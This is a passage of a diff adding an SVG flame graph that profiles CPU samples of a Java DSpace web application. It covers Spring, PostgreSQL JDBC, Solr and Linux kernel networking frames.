+<title>remove_wait_queue (1 samples, 0.09%)</title><rect x="98.1" y="1173" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="101.12" y="1183.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/support/ResourceEditorRegistrar:::registerCustomEditors (2 samples, 0.18%)</title><rect x="900.9" y="869" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="903.91" y="879.5" ></text>
+</g>
+<g >
+<title>kmem_cache_alloc_node (1 samples, 0.09%)</title><rect x="190.5" y="1157" width="1.1" height="15.0" fill="rgb(225,87,87)" rx="2" ry="2" />
+<text  x="193.55" y="1167.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="837.5" y="933" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="840.50" y="943.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::predictBeanType (22 samples, 2.00%)</title><rect x="965.4" y="901" width="23.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="968.39" y="911.5" >o..</text>
+</g>
+<g >
+<title>ret_from_intr (1 samples, 0.09%)</title><rect x="137.9" y="1205" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="140.89" y="1215.5" ></text>
+</g>
+<g >
+<title>fput_many (1 samples, 0.09%)</title><rect x="87.4" y="1237" width="1.1" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="90.38" y="1247.5" ></text>
+</g>
+<g >
+<title>ip_rcv (1 samples, 0.09%)</title><rect x="1078.2" y="341" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="351.5" ></text>
+</g>
+<g >
+<title>tcp_v6_connect (1 samples, 0.09%)</title><rect x="1078.2" y="645" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1081.23" y="655.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="884.8" y="821" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="887.79" y="831.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/Context:::&lt;init&gt; (7 samples, 0.64%)</title><rect x="1165.3" y="997" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1168.28" y="1007.5" ></text>
+</g>
+<g >
+<title>acpi_hw_read (1 samples, 0.09%)</title><rect x="790.2" y="629" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="793.22" y="639.5" ></text>
+</g>
+<g >
+<title>ip_local_out (1 samples, 0.09%)</title><rect x="249.7" y="645" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="252.65" y="655.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::loadParameters (1 samples, 0.09%)</title><rect x="1029.9" y="933" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1032.87" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/pool/impl/GenericKeyedObjectPool:::borrowObject (1 samples, 0.09%)</title><rect x="572.1" y="901" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="575.06" y="911.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::ReceiveTupleV3 (1 samples, 0.09%)</title><rect x="421.6" y="757" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="767.5" ></text>
+</g>
+<g >
+<title>__libc_connect (1 samples, 0.09%)</title><rect x="1078.2" y="757" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1081.23" y="767.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="884.8" y="805" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="887.79" y="815.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (1 samples, 0.09%)</title><rect x="717.1" y="709" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="720.14" y="719.5" ></text>
+</g>
+<g >
+<title>intel_tfa_pmu_enable_all (12 samples, 1.09%)</title><rect x="117.5" y="1045" width="12.9" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="120.47" y="1055.5" ></text>
+</g>
+<g >
+<title>exit_to_usermode_loop (1 samples, 0.09%)</title><rect x="368.9" y="1285" width="1.1" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="371.94" y="1295.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="821.4" y="789" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="824.38" y="799.5" ></text>
+</g>
+<g >
+<title>__wake_up_sync_key (22 samples, 2.00%)</title><rect x="251.8" y="725" width="23.6" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="254.80" y="735.5" >_..</text>
+</g>
+<g >
+<title>[libjvm.so] (8 samples, 0.73%)</title><rect x="1100.8" y="821" width="8.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1103.80" y="831.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Node:::study (4 samples, 0.36%)</title><rect x="920.3" y="805" width="4.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="923.26" y="815.5" ></text>
+</g>
+<g >
+<title>__skb_datagram_iter (1 samples, 0.09%)</title><rect x="132.5" y="1173" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="135.51" y="1183.5" ></text>
+</g>
+<g >
+<title>java/util/HashSet:::contains (1 samples, 0.09%)</title><rect x="589.3" y="965" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="592.25" y="975.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (1 samples, 0.09%)</title><rect x="1111.5" y="709" width="1.1" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="1114.55" y="719.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1121.2" y="901" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1124.22" y="911.5" ></text>
+</g>
+<g >
+<title>intel_tfa_pmu_enable_all (60 samples, 5.46%)</title><rect x="13.2" y="1093" width="64.5" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="16.22" y="1103.5" >intel_t..</text>
+</g>
+<g >
+<title>run_rebalance_domains (1 samples, 0.09%)</title><rect x="220.6" y="917" width="1.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="223.64" y="927.5" ></text>
+</g>
+<g >
+<title>org/springframework/context/support/AbstractApplicationContext$BeanPostProcessorChecker:::postProcessAfterInitialization (1 samples, 0.09%)</title><rect x="935.3" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="938.30" y="911.5" ></text>
+</g>
+<g >
+<title>java/util/Formatter:::format (15 samples, 1.37%)</title><rect x="704.2" y="869" width="16.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="707.24" y="879.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/SolrInputDocument:::addField (1 samples, 0.09%)</title><rect x="882.6" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="885.64" y="959.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1165.3" y="933" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1168.28" y="943.5" ></text>
+</g>
+<g >
+<title>iptable_security_hook (1 samples, 0.09%)</title><rect x="212.0" y="1029" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="215.04" y="1039.5" ></text>
+</g>
+<g >
+<title>ext4_do_update_inode (1 samples, 0.09%)</title><rect x="1139.5" y="597" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1142.49" y="607.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (4 samples, 0.36%)</title><rect x="820.3" y="885" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="823.31" y="895.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Begin:::match (5 samples, 0.46%)</title><rect x="845.0" y="901" width="5.4" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="848.03" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="835.4" y="917" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="838.36" y="927.5" ></text>
+</g>
+<g >
+<title>refcount_sub_and_test_checked (2 samples, 0.18%)</title><rect x="92.8" y="1141" width="2.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="95.75" y="1151.5" ></text>
+</g>
+<g >
+<title>bbr_update_model (2 samples, 0.18%)</title><rect x="279.7" y="709" width="2.2" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="282.74" y="719.5" ></text>
+</g>
+<g >
+<title>__GI___libc_open (1 samples, 0.09%)</title><rect x="11.1" y="1301" width="1.0" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="14.07" y="1311.5" ></text>
+</g>
+<g >
+<title>deactivate_task (1 samples, 0.09%)</title><rect x="1110.5" y="709" width="1.0" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="1113.47" y="719.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadata (1 samples, 0.09%)</title><rect x="798.8" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="801.82" y="959.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::getIntColumn (1 samples, 0.09%)</title><rect x="727.9" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="730.89" y="959.5" ></text>
+</g>
+<g >
+<title>tcp_in_window (1 samples, 0.09%)</title><rect x="218.5" y="997" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="221.49" y="1007.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="748.3" y="885" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="751.31" y="895.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (3 samples, 0.27%)</title><rect x="735.4" y="853" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="738.41" y="863.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$CharProperty:::match (2 samples, 0.18%)</title><rect x="848.3" y="869" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="851.25" y="879.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (3 samples, 0.27%)</title><rect x="1161.0" y="965" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1163.98" y="975.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (1 samples, 0.09%)</title><rect x="1121.2" y="629" width="1.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="1124.22" y="639.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="461.4" y="821" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="464.37" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (2 samples, 0.18%)</title><rect x="764.4" y="917" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="767.43" y="927.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::close (1 samples, 0.09%)</title><rect x="1166.4" y="949" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1169.36" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="878.3" y="917" width="3.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="881.34" y="927.5" ></text>
+</g>
+<g >
+<title>iptable_mangle_hook (1 samples, 0.09%)</title><rect x="293.7" y="805" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="296.72" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (1 samples, 0.09%)</title><rect x="744.0" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="747.01" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="421.6" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="879.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BranchConn:::match (2 samples, 0.18%)</title><rect x="716.1" y="757" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="719.07" y="767.5" ></text>
+</g>
+<g >
+<title>ipv4_conntrack_in (2 samples, 0.18%)</title><rect x="304.5" y="837" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="307.46" y="847.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1078.2" y="805" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="815.5" ></text>
+</g>
+<g >
+<title>tcp_v4_do_rcv (1 samples, 0.09%)</title><rect x="165.8" y="1157" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="168.83" y="1167.5" ></text>
+</g>
+<g >
+<title>java/lang/Class:::getEnclosingMethod0 (1 samples, 0.09%)</title><rect x="632.2" y="885" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="635.24" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="884.8" y="933" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="887.79" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (5 samples, 0.46%)</title><rect x="785.9" y="901" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.92" y="911.5" ></text>
+</g>
+<g >
+<title>tcp_v4_conn_request (1 samples, 0.09%)</title><rect x="1078.2" y="197" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1081.23" y="207.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="421.6" y="853" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="863.5" ></text>
+</g>
+<g >
+<title>tcp_v4_do_rcv (41 samples, 3.73%)</title><rect x="246.4" y="773" width="44.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="249.43" y="783.5" >tcp_..</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="752.6" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="755.60" y="943.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match0 (1 samples, 0.09%)</title><rect x="803.1" y="885" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="806.11" y="895.5" ></text>
+</g>
+<g >
+<title>ip_local_deliver_finish (51 samples, 4.64%)</title><rect x="236.8" y="821" width="54.8" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="239.76" y="831.5" >ip_lo..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (12 samples, 1.09%)</title><rect x="803.1" y="933" width="12.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="806.11" y="943.5" ></text>
+</g>
+<g >
+<title>nft_lookup_eval (1 samples, 0.09%)</title><rect x="300.2" y="773" width="1.0" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="303.16" y="783.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/pool/impl/GenericObjectPool:::borrowObject (6 samples, 0.55%)</title><rect x="1166.4" y="981" width="6.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1169.36" y="991.5" ></text>
+</g>
+<g >
+<title>irq_exit (1 samples, 0.09%)</title><rect x="220.6" y="949" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="223.64" y="959.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="462.4" y="837" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="465.44" y="847.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::put (2 samples, 0.18%)</title><rect x="864.4" y="933" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="867.37" y="943.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="733.3" y="869" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="736.26" y="879.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingConnection$PStmtKey:::hashCode (1 samples, 0.09%)</title><rect x="791.3" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="794.29" y="895.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (13 samples, 1.18%)</title><rect x="540.9" y="853" width="14.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="543.89" y="863.5" ></text>
+</g>
+<g >
+<title>run_rebalance_domains (1 samples, 0.09%)</title><rect x="735.4" y="661" width="1.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="738.41" y="671.5" ></text>
+</g>
+<g >
+<title>vfs_write (2 samples, 0.18%)</title><rect x="1138.4" y="789" width="2.2" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1141.42" y="799.5" ></text>
+</g>
+<g >
+<title>handle_irq_event_percpu (1 samples, 0.09%)</title><rect x="790.2" y="725" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="793.22" y="735.5" ></text>
+</g>
+<g >
+<title>nf_conntrack_in (1 samples, 0.09%)</title><rect x="219.6" y="1029" width="1.0" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="222.56" y="1039.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$CharProperty:::match (1 samples, 0.09%)</title><rect x="917.0" y="613" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="920.03" y="623.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractCollection:::addAll (1 samples, 0.09%)</title><rect x="587.1" y="965" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="590.10" y="975.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/GenericConversionService:::addConverter (18 samples, 1.64%)</title><rect x="682.8" y="885" width="19.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="685.75" y="895.5" ></text>
+</g>
+<g >
+<title>ctx_sched_in (1 samples, 0.09%)</title><rect x="1111.5" y="661" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1114.55" y="671.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::ReceiveTupleV3 (1 samples, 0.09%)</title><rect x="813.9" y="773" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="816.86" y="783.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (9 samples, 0.82%)</title><rect x="1099.7" y="869" width="9.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1102.73" y="879.5" ></text>
+</g>
+<g >
+<title>dec_pending (1 samples, 0.09%)</title><rect x="137.9" y="885" width="1.1" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="140.89" y="895.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.18%)</title><rect x="749.4" y="853" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="752.38" y="863.5" ></text>
+</g>
+<g >
+<title>ip_queue_xmit (137 samples, 12.48%)</title><rect x="200.2" y="1109" width="147.2" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="203.22" y="1119.5" >ip_queue_xmit</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="1147.0" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1150.01" y="943.5" ></text>
+</g>
+<g >
+<title>acpi_os_read_port (1 samples, 0.09%)</title><rect x="132.5" y="933" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="135.51" y="943.5" ></text>
+</g>
+<g >
+<title>iptable_filter_hook (3 samples, 0.27%)</title><rect x="205.6" y="1029" width="3.2" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="208.59" y="1039.5" ></text>
+</g>
+<g >
+<title>com/atmire/dspace/discovery/AtmireSolrService:::logduration (1 samples, 0.09%)</title><rect x="1044.9" y="981" width="1.1" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="1047.92" y="991.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::loadParameters (1 samples, 0.09%)</title><rect x="869.7" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="872.74" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="1151.3" y="933" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1154.31" y="943.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (1 samples, 0.09%)</title><rect x="755.8" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="758.83" y="943.5" ></text>
+</g>
+<g >
+<title>ip_protocol_deliver_rcu (1 samples, 0.09%)</title><rect x="1078.2" y="277" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="287.5" ></text>
+</g>
+<g >
+<title>java/lang/AbstractStringBuilder:::append (1 samples, 0.09%)</title><rect x="1055.7" y="965" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1058.66" y="975.5" ></text>
+</g>
+<g >
+<title>__fget (1 samples, 0.09%)</title><rect x="136.8" y="1205" width="1.1" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="139.81" y="1215.5" ></text>
+</g>
+<g >
+<title>acpi_ev_gpe_detect (1 samples, 0.09%)</title><rect x="421.6" y="581" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="424.60" y="591.5" ></text>
+</g>
+<g >
+<title>tcp_rcv_space_adjust (1 samples, 0.09%)</title><rect x="135.7" y="1189" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="138.74" y="1199.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="545.2" y="613" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="548.19" y="623.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::hasNext (4 samples, 0.36%)</title><rect x="1159.9" y="981" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1162.91" y="991.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (4 samples, 0.36%)</title><rect x="916.0" y="773" width="4.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="918.96" y="783.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (4 samples, 0.36%)</title><rect x="785.9" y="821" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.92" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (5 samples, 0.46%)</title><rect x="785.9" y="917" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.92" y="927.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendSync (1 samples, 0.09%)</title><rect x="1170.7" y="933" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1173.66" y="943.5" ></text>
+</g>
+<g >
+<title>jshort_arraycopy (1 samples, 0.09%)</title><rect x="590.3" y="965" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="593.33" y="975.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1122.3" y="917" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1125.30" y="927.5" ></text>
+</g>
+<g >
+<title>nf_nat_ipv4_local_fn (1 samples, 0.09%)</title><rect x="220.6" y="1029" width="1.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="223.64" y="1039.5" ></text>
+</g>
+<g >
+<title>jlong_disjoint_arraycopy (3 samples, 0.27%)</title><rect x="467.8" y="885" width="3.2" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="470.81" y="895.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeansOfType (114 samples, 10.38%)</title><rect x="893.4" y="933" width="122.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="896.39" y="943.5" >org/springframe..</text>
+</g>
+<g >
+<title>update_cfs_group (1 samples, 0.09%)</title><rect x="105.6" y="1061" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="108.65" y="1071.5" ></text>
+</g>
+<g >
+<title>kmem_cache_alloc_node (4 samples, 0.36%)</title><rect x="185.2" y="1141" width="4.3" height="15.0" fill="rgb(225,87,87)" rx="2" ry="2" />
+<text  x="188.17" y="1151.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::receiveFields (1 samples, 0.09%)</title><rect x="1169.6" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1172.58" y="927.5" ></text>
+</g>
+<g >
+<title>tcp_current_mss (1 samples, 0.09%)</title><rect x="360.3" y="1157" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="363.35" y="1167.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="878.3" y="805" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="881.34" y="815.5" ></text>
+</g>
+<g >
+<title>skb_copy_datagram_iter (1 samples, 0.09%)</title><rect x="132.5" y="1189" width="1.1" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="135.51" y="1199.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (3 samples, 0.27%)</title><rect x="740.8" y="821" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="831.5" ></text>
+</g>
+<g >
+<title>read_tsc (1 samples, 0.09%)</title><rect x="177.7" y="1029" width="1.0" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="180.65" y="1039.5" ></text>
+</g>
+<g >
+<title>__wake_up_common (1 samples, 0.09%)</title><rect x="137.9" y="741" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="140.89" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="827.8" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="830.83" y="911.5" ></text>
+</g>
+<g >
